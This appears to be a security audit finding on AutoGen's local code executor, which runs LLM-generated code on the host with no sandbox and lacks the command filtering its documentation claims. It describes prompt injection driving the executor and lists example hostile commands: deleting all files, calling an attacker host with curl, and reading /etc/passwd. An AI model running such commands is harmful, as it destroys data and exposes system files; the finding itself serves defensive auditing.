python/packages/autogen-ext/src/autogen_ext/code_executors/local/__init__.py
The LocalCommandLineCodeExecutor executes code directly on the host system without any sandboxing. The documentation claims sanitization occurs:
"Command line code is sanitized using regular expression match against a list of dangerous commands"
However, this sanitization was NOT FOUND in the actual code implementation. The executor:
- Writes code to temporary files
- Executes code via
asyncio.create_subprocess_exec() - Has NO filtering of dangerous shell commands
- Has NO resource limits beyond timeout
A malicious LLM or prompt injection can cause execution of:
rm -rf / # Delete all files
curl attacker.com # Download and execute malware
cat /etc/passwd # Exfiltrate sensitive data- Severity: CRITICAL
- Impact: Complete system compromise
- Likelihood: HIGH (default executor for many use cases)
- User warning about "unsafe" nature
- Documentation recommends using Docker executor instead
- Timeout limit (60 seconds default)
- Implement actual dangerous command filtering (rm -rf, mkfs, etc.)
- Implement filesystem access restrictions (chroot, seccomp)
- Block network access in local executor
- Make Docker executor the default
- Add capability to run as non-privileged user